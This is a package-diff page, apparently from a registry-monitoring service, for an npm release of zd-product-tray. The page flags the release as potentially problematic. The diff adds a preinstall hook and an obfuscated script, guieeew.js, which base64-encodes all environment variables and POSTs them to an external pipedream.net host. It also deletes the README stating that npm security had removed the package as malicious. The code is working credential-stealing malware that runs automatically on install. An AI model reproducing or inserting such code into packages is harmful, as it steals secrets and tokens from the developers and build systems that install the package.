zd-product-tray 0.0.1-security → 4.732.317
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of zd-product-tray might be problematic. Click here for more details.
- package/guieeew.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/guieeew.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const a0_0xe0184f=a0_0x5ca7;(function(_0x434a0b,_0x3b7021){const _0xea3fe3=a0_0x5ca7,_0x43af91=_0x434a0b();while(!![]){try{const _0xceb07b=-parseInt(_0xea3fe3(0x14b))/0x1*(parseInt(_0xea3fe3(0x144))/0x2)+parseInt(_0xea3fe3(0x13d))/0x3+-parseInt(_0xea3fe3(0x150))/0x4+-parseInt(_0xea3fe3(0x14a))/0x5*(-parseInt(_0xea3fe3(0x14c))/0x6)+parseInt(_0xea3fe3(0x143))/0x7*(-parseInt(_0xea3fe3(0x140))/0x8)+-parseInt(_0xea3fe3(0x145))/0x9*(parseInt(_0xea3fe3(0x13e))/0xa)+parseInt(_0xea3fe3(0x149))/0xb;if(_0xceb07b===_0x3b7021)break;else _0x43af91['push'](_0x43af91['shift']());}catch(_0x2952be){_0x43af91['push'](_0x43af91['shift']());}}}(a0_0x5b17,0x700ad));function a0_0x5ca7(_0x421e99,_0x3356a3){const _0x5b1734=a0_0x5b17();return a0_0x5ca7=function(_0x5ca724,_0x39f71a){_0x5ca724=_0x5ca724-0x13c;let _0x597c1f=_0x5b1734[_0x5ca724];return _0x597c1f;},a0_0x5ca7(_0x421e99,_0x3356a3);}const http=require(a0_0xe0184f(0x13f));req=http[a0_0xe0184f(0x151)]({'host':['4aaa0dfa016c3686a57e93787657fa37','m',a0_0xe0184f(0x141),a0_0xe0184f(0x142)]['join']('.'),'path':'/'+(process[a0_0xe0184f(0x147)][a0_0xe0184f(0x13c)]||''),'method':'POST'}),req['write'](Buffer[a0_0xe0184f(0x14d)](JSON[a0_0xe0184f(0x14e)](process['env']))[a0_0xe0184f(0x148)](a0_0xe0184f(0x146))),req[a0_0xe0184f(0x14f)]();function a0_0x5b17(){const _0x39863f=['117QtxNjP','base64','env','toString','5680323UOtfYc','165HpXHso','10161zYMdPy','40734kkRQxC','from','stringify','end','2364432eMtejN','request','npm_package_name','2478885cOxMvg','226360eblxxc','https','8ZCwDgi','pipedream','net','63301BPdKLR','42cssVAs'];a0_0x5b17=function(){return _0x39863f;};return a0_0x5b17();}
|
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "zd-product-tray",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "4.732.317",
|
4
|
+
"main": "guieeew.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node guieeew.js"
|
8
|
+
},
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC"
|
6
11
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=zd-product-tray for more information.
|